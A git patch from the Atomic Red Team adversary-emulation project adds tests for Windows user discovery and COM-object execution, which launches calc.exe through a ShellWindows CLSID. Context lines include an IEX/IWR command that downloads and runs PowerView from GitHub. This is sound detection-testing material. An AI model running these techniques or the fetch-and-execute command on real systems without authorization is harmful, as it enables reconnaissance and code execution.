From 13200b42f9cd68d3dbff9f5ba9aa094ffb22a2b9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 23 Mar 2022 17:44:48 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 4 ++
 atomics/Indexes/Indexes-CSV/windows-index.csv | 4 ++
 atomics/Indexes/Indexes-Markdown/index.md | 4 ++
 .../Indexes/Indexes-Markdown/windows-index.md | 4 ++
 atomics/Indexes/index.yaml | 56 +++++++++++++++
 atomics/T1033/T1033.md | 69 +++++++++++++++++++
 atomics/T1546.015/T1546.015.md | 36 ++++++++++
 7 files changed, 177 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 335b8d69..f763fb6f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -188,6 +188,7 @@ privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PR
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
@@ -674,6 +675,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso
 persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -948,6 +950,8 @@ discovery,T1049,System Network Connections Discovery,4,System Discovery using Sh
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
+discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
+discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a45526c2..12258340 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -130,6 +130,7 @@ privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -466,6 +467,7 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -647,6 +649,8 @@ discovery,T1049,System Network Connections Discovery,2,System Network Connection
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
+discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
+discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3155f297..11060e2d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -301,6 +301,7 @@
 - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
 - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+ - Atomic Test #2: Powershell Execute COM Object [windows]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
 - Atomic Test #1: ListCronjobs [containers]
 - Atomic Test #2: CreateCronjob [containers]
@@ -1050,6 +1051,7 @@
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
 - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+ - Atomic Test #2: Powershell Execute COM Object [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
 - Atomic Test #1: ListCronjobs [containers]
@@ -1473,6 +1475,8 @@
 - Atomic Test #1: System Owner/User Discovery [windows]
 - Atomic Test #2: System Owner/User Discovery [linux, macos]
 - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
+ - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
+ - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
 - Atomic Test #1: System Service Discovery [windows]
 - Atomic Test #2: System Service Discovery - net.exe [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 670521ae..b0a32203 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -226,6 +226,7 @@
 - Atomic Test #1: Change Default File Association [windows]
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
 - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+ - Atomic Test #2: Powershell Execute COM Object [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
 - Atomic Test #1: Access Token Manipulation [windows]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -755,6 +756,7 @@
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
 - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+ - Atomic Test #2: Powershell Execute COM Object [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1053,6 +1055,8 @@
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
 - Atomic Test #1: System Owner/User Discovery [windows]
 - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
+ - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
+ - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
 - Atomic Test #1: System Service Discovery [windows]
 - Atomic Test #2: System Service Discovery - net.exe [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66fa8489..07e3fc05 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -12831,6 +12831,21 @@ privilege-escalation: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: Powershell Execute COM Object + auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb + description: Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + supported_platforms: + - windows + executor: + command: | + $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) + $item = $o.Item() + $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) + cleanup_command: 'Get-Process -Name "*calc" | Stop-Process + +' + name: powershell T1053.007: technique: external_references: @@ -44194,6 +44209,21 @@ persistence: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: Powershell Execute COM Object + auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb + description: Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + supported_platforms: + - windows + executor: + command: | + $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) + $item = $o.Item() + $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) + cleanup_command: 'Get-Process -Name "*calc" | Stop-Process + +' + name: powershell T1554: technique: created: '2020-02-11T18:18:34.279Z' 
@@ -59662,6 +59692,32 @@ discovery: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell + - name: User Discovery With Env Vars PowerShell Script + auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 + description: Use the PowerShell environment variables to identify the current + logged user. + supported_platforms: + - windows + executor: + command: "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt + \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n" + cleanup_command: 'Remove-Item -Path .\CurrentactiveUser.txt -Force + +' + name: powershell + - name: GetCurrent User with PowerShell Script + auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b + description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET + class to identify the logged user. + supported_platforms: + - windows + executor: + command: "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File + -FilePath .\\CurrentUserObject.txt\n" + cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force + +' + name: powershell T1007: technique: created: '2017-05-31T21:30:21.315Z' diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 7e46c994..550a4dab 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md 
@@ -12,6 +12,10 @@ Utilities and commands that acquire this information include whoami - [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview) +- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script) + +- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script) +
@@ -116,4 +120,69 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +
+
+ +## Atomic Test #4 - User Discovery With Env Vars PowerShell Script +Use the PowerShell environment variables to identify the current logged user. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt +$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path .\CurrentactiveUser.txt -Force +``` + + + + + +
+
+ +## Atomic Test #5 - GetCurrent User with PowerShell Script +Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path .\CurrentUserObject.txt -Force +``` + + + + +
diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md index 374164ce..00d8a97c 100644 --- a/atomics/T1546.015/T1546.015.md +++ b/atomics/T1546.015/T1546.015.md @@ -8,6 +8,8 @@ Adversaries can use the COM system to insert malicious code that can be executed - [Atomic Test #1 - COM Hijacking - InprocServer32](#atomic-test-1---com-hijacking---inprocserver32) +- [Atomic Test #2 - Powershell Execute COM Object](#atomic-test-2---powershell-execute-com-object) +
@@ -65,4 +67,38 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - Powershell Execute COM Object +Use the PowerShell to execute COM CLSID object. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 752191b1-7c71-445c-9dbe-21bb031b18eb + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) +$item = $o.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +#### Cleanup Commands: +```powershell +Get-Process -Name "*calc" | Stop-Process +``` + + + + +